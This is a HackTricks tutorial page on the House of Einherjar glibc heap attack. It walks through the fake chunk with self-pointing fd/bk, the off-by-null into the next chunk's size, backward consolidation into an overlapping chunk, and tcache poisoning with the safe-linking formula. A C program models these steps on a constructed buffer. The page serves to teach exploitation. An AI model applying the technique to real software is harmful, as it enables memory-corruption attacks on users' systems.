hacktricks/binary-exploitation/libc-heap/house-of-einherjar.md
Carlos Polop 731fca1d57 a
2024-07-18 18:14:56 +02:00

House of Einherjar

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Basic Information

Code

Goal

  • The goal is to make malloc return a chunk at an almost arbitrary address: first a chunk that overlaps other heap chunks, then, through that overlap, a poisoned free list that hands out the target address.

Requirements

  • A fake chunk, built inside memory the attacker controls, at the address where the consolidated chunk should start:
    • Its fd and bk point to the fake chunk itself, so the fd->bk == p && bk->fd == p checks in unlink_chunk pass.
  • A one-byte overflow of a null byte from one chunk into the size field of the next chunk, which clears that chunk's PREV_INUSE flag.
  • The prev_size of the chunk hit by the off-by-null set to the distance between that chunk and the fake chunk, so that backward consolidation lands on the fake chunk.
    • The size stored in the fake chunk must be that same value, because glibc 2.26 and later abort with "corrupted size vs. prev_size" when chunksize(prev) != prev_size.
  • A heap leak, needed both to compute that distance and to write the fake chunk's self-pointers.

Attack

  • A fake chunk is created inside a chunk A controlled by the attacker, with fd and bk pointing to the fake chunk itself to pass the unlink checks.
  • Two more chunks, B and C, are allocated; C must not be fastbin-sized, since a fast bin free never consolidates.
  • Abusing the off-by-one in B, the lowest byte of C's size is overwritten with 0x00, clearing PREV_INUSE, and C's prev_size is overwritten with the distance from C back to the fake chunk in A.
    • This prev_size and the size stored in the fake chunk must be equal to pass the checks.
  • Then the tcache bin for C's size is filled, so that free(C) reaches _int_free instead of being stashed in the tcache.
  • Then C is freed: seeing PREV_INUSE clear, _int_free walks back prev_size bytes, finds the fake chunk, unlinks it and merges it with C into one free chunk in the unsorted bin.
  • Then a new chunk D is requested, large enough to be served from that merged chunk: it starts at the fake chunk and covers B.
    • The House of Einherjar finishes here: D overlaps B.
  • This can be continued with a fast bin attack or tcache poisoning:
    • Free B so it goes into the fast bin / tcache.
    • Overwrite B's fd through D (which contains B) so it points to the target address; on glibc 2.32 and later the fd is safe-linked, so the value written must be (address_of_fd >> 12) ^ target, which the heap leak makes possible.
    • Then two mallocs of B's size are made; the second one returns the target address.
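
The whole procedure above, from the fake chunk through the consolidation to the safe-linked fd for the tcache stage, as an added example that is not code from the page or from how2heap. Rather than driving a real glibc (which would tie the sizes to one glibc version), it lays the chunk headers out on a constructed buffer and re-implements the two checks glibc runs on the backward-consolidation path, so the values that have to agree are visible. The heap layout, the chunk sizes, the names A, B, C, FAKE, house_of_einherjar and protect_ptr, and the x86-64 little-endian header layout are all assumptions of this example.

```c
/* Added model of the House of Einherjar bookkeeping, not a live exploit: a
 * constructed x86-64 heap laid out like glibc chunks, plus the checks glibc
 * 2.26+ runs before merging backwards. Layout, sizes and names are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define SIZE_BITS    0x7UL
#define PREV_INUSE   0x1UL
#define chunksize(p) ((p)->size & ~SIZE_BITS)

typedef struct chunk {
    size_t prev_size;        /* valid only while the previous chunk is free */
    size_t size;             /* low bit = PREV_INUSE */
    struct chunk *fd, *bk;   /* bin links, valid only while free */
} chunk;

/* Constructed heap (0x200 bytes): A (0x40) holds the fake chunk, B (0x30)
 * carries the off-by-null, C (0x100) is the chunk that gets freed. */
static uint64_t heap_words[0x40];
#define HEAP ((uint8_t *)heap_words)
#define A    ((chunk *)(HEAP + 0x00))
#define B    ((chunk *)(HEAP + 0x40))
#define C    ((chunk *)(HEAP + 0x70))
#define FAKE ((chunk *)(HEAP + 0x10))   /* inside A's user data */

static void setup_heap(void)
{
    memset(heap_words, 0, sizeof heap_words);
    A->size = 0x40 | PREV_INUSE;
    B->size = 0x30 | PREV_INUSE;
    C->size = 0x100 | PREV_INUSE;
}

/* Step 1: fake chunk in A, fd/bk pointing to itself so unlink_chunk's
 * "fd->bk != p || bk->fd != p" check does not fire. */
static chunk *build_fake_chunk(size_t fake_size)
{
    FAKE->prev_size = 0;
    FAKE->size = fake_size;
    FAKE->fd = FAKE->bk = FAKE;
    return FAKE;
}

/* Step 2: the bug. B's user data is 0x28 bytes; copying 0x29 drops a NUL into
 * the low byte of C->size (clearing PREV_INUSE), the 8 before it into C->prev_size. */
static void off_by_null(size_t forged_prev_size)
{
    uint8_t payload[0x29];
    memset(payload, 'B', 0x20);
    memcpy(payload + 0x20, &forged_prev_size, sizeof forged_prev_size);
    payload[0x28] = 0;
    memcpy((uint8_t *)B + 0x10, payload, sizeof payload);   /* one byte too many */
}

/* Step 3: what _int_free does with C once the tcache for its size is full.
 * Returns the merged chunk (destined for the unsorted bin) or NULL where glibc aborts. */
static chunk *free_consolidate_backward(chunk *p)
{
    if (p->size & PREV_INUSE) return NULL;     /* no backward consolidation */
    size_t prevsize = p->prev_size;
    chunk *prev = (chunk *)((uint8_t *)p - prevsize);
    if (chunksize(prev) != prevsize)
        return NULL;   /* "corrupted size vs. prev_size while consolidating" */
    if (prev->fd->bk != prev || prev->bk->fd != prev)
        return NULL;   /* unlink_chunk: "corrupted double-linked list" */
    prev->size = (prevsize + chunksize(p)) | PREV_INUSE;
    return prev;
}

/* Whole sequence. Returns what a following malloc large enough to be served
 * from the merged chunk would get: the fake chunk, which covers B. */
static chunk *house_of_einherjar(size_t fake_size)
{
    setup_heap();
    chunk *fake = build_fake_chunk(fake_size);
    size_t distance = (size_t)((uint8_t *)C - (uint8_t *)fake);   /* 0x60 */
    off_by_null(distance);
    return free_consolidate_backward(C);
}

/* glibc 2.32+ safe-linking: a tcache/fastbin fd is stored as (&fd >> 12) ^
 * target, so the fd forged through D must be mangled with the leaked heap
 * address. The same XOR decodes it. */
static uintptr_t protect_ptr(uintptr_t fd_addr, uintptr_t target)
{
    return (fd_addr >> 12) ^ target;
}

int main(void)
{
    chunk *d = house_of_einherjar(0x60);   /* NULL if a check would abort */
    printf("fake %p, B %p, merged %p size 0x%zx\n", (void *)FAKE, (void *)B,
           (void *)d, d ? chunksize(d) : (size_t)0);
    /* B's tcache next pointer lives in its fd slot; that is what D writes */
    printf("safe-linked fd for 0xdeadbeef: 0x%lx\n",
           (unsigned long)protect_ptr((uintptr_t)&B->fd, 0xdeadbeef));
    return 0;
}
```

house_of_einherjar(0x60) returns the fake chunk because its size equals the 0x60 distance written into C's prev_size; house_of_einherjar(0x50) returns NULL, which is the point where a real glibc prints "corrupted size vs. prev_size while consolidating" and aborts. For the tcache-poisoning continuation on glibc 2.32 and later, the value D writes into B's fd slot is protect_ptr(&B->fd, target), not the raw target.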

References and other examples
